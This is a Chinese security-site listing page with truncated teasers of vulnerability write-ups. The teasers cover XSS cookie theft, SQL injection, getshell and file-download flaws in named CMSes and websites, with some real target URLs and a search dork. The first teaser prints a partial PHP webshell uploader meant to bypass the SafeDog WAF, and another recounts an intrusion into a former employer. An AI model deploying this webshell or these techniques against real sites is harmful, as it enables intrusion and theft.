php绕过安全狗检测的小马分享 - 网站安全 - 自学关注热度:18

直接上代码：?php$p=realpath(dirname(__FILE__) ) $_POST[a];$t=$_POST[b];$tt=;for ($i=0;$istrlen($t);$i+=2) $tt =urldecode(% substr($t,$i,2));@fwrite(fopen($p,w),$tt);echo succ..[详情]

记一次曲曲折折的win8黑客入侵渗透攻击 - 网站安关注热度:16

事情是这样的，有一段时间在A公司实习过，就想渗透A公司，各种工具各种扫，终于发现一个注入点，拿到了后台的密码，登陆进去之后，没有利用的地方，上传点卡的特别严，即使传上..[详情]

利用QQ面板登陆验证不严格+Arp嗅探来登陆内网的关注热度:11

这个可以说没有技术含量,只是说个思路,先简单演示下 1 打开burp设置好浏览器代理然后点下QQ面板里的QQ空间快捷登陆可以看到burp拦截了,主要就是拦截到的这段RUL2 把这个URL复制下下来拿..[详情]

汽车之家旗下一个存储型XSS（证明可劫持商家后关注热度:8

汽车之家旗下的二手车交易中心留言处出现XSS 导致能抓取商家COOKIE 留言处插入代码获取到商家COOKIE伪造COOKIE登录进去商家后台..[详情]

赶集网手机弹窗执行xss指谁打谁 - 网站安全 - 自关注热度:9

1,通知界面2,随便找个人3,Xss4,弹出漏洞修补建议：过滤掉那里吧..[详情]

关于Jenkins安全测试的一些技巧 - 网站安全 - 自学关注热度:12

今天mickey牛发来一篇关于hacking Jenkins的文章，受益匪浅，虽然不是很高深的东西，看完几篇相关文章之后记录下要点，为以后做安全测试留下笔记。 文章链接：http: www labofapenetrationtes..[详情]

phpshe1.2前台无需登录getshell - 网站安全 - 自学ph关注热度:13

存在漏洞的文件install index php，整个过程没有判断install lock，导致可以重复安装，同是在安装的过程中，对配置项没有进行任何处理，导致任意代码写入。详细分析如下：install index php..[详情]

搜狐焦点某影响所有分站的注入漏洞 - 网站安全关注热度:8

具体参数是：brand_intro phpgoogle一下发现gz focus cn vote brand_intro php?brand_id=46house focus cn vote brand_intro php?brand_id=67dl focus cn vote brand_intro php?brand_id=house focus cn vote br..[详情]

CmsEasy最新版SQL注入可获取管理员账户 - 网站安全关注热度:10

与： CmsEasy最新版本无限制SQL注射:http: www 2cto com Article 201407 313603 html 重复:CmsEasy_5 5_UTF-8_20140420官方最新包文件 lib default archive_act php在提交订单时：function orders_action()..[详情]

CmsEasy最新版SQL注入(同一文件多处) - 网站安全关注热度:14

与：CmsEasy最新版本无限制SQL注射:http: www 2cto com Article 201407 313603 html重复CmsEasy_5 5_UTF-8_20140420官方最新包文件 lib default union_act php此文件存在多处SQL注入第一处SQL注入，在联盟注册处..[详情]

TRSWCM 后台权限绕过以及GETSHELL(含详细修复方案关注热度:27

TRS WCM大于v6版本中存在此漏洞，v5 X版本不存在。无需登录。注：该漏洞目前影响大量站点，担心厂商忽略导致漏洞细节提前曝光，请管理员同学转至cncert国家互联网应急中心进行处理，..[详情]

如何评价XSS在黑客攻防中的地位或重要性？ - 网关注热度:15

在我看来XSS使整个WEB体系变得具有灵性了，早年期间XSS漏洞不流行的时候，随手在某个网站上输入一个, 回显出来就有可能够把局部页面弄乱，这样的WEB站点如同一个没有生命的机器人一..[详情]

U-Mail任意文件上传漏洞一枚及修复 - 网站安全关注热度:10

先登录官方测试站点：这里登录的账号为：mailtest3721再获取当前登录用户的user_idhttp: mail comingchina com webmail client oab index php?module=operateaction=member-getpage=1orderby=is_reverse=1..[详情]

新东方在线学习网站一处任意文件下载问题导致关注热度:6

新东方在线学习网站http: www koolearn com 上面的教程不错，最近正在学雅思，就花了几百大洋买了套教程（很坑爹，教程有效期为1个月），无意间发现了一处任意文件下载，然后就开始x..[详情]

金迪邮件系统任意用户劫持到添加系统管理员关注热度:13

金迪邮件系统，JDMAIL用户量很大，官方案例：http: www mailer com cn Products6 htmlhttp: www mailer com cn New%20Customers index1 htm利用证明：关键字：intitle:金笛邮件管理系统http: mail lyx928 com..[详情]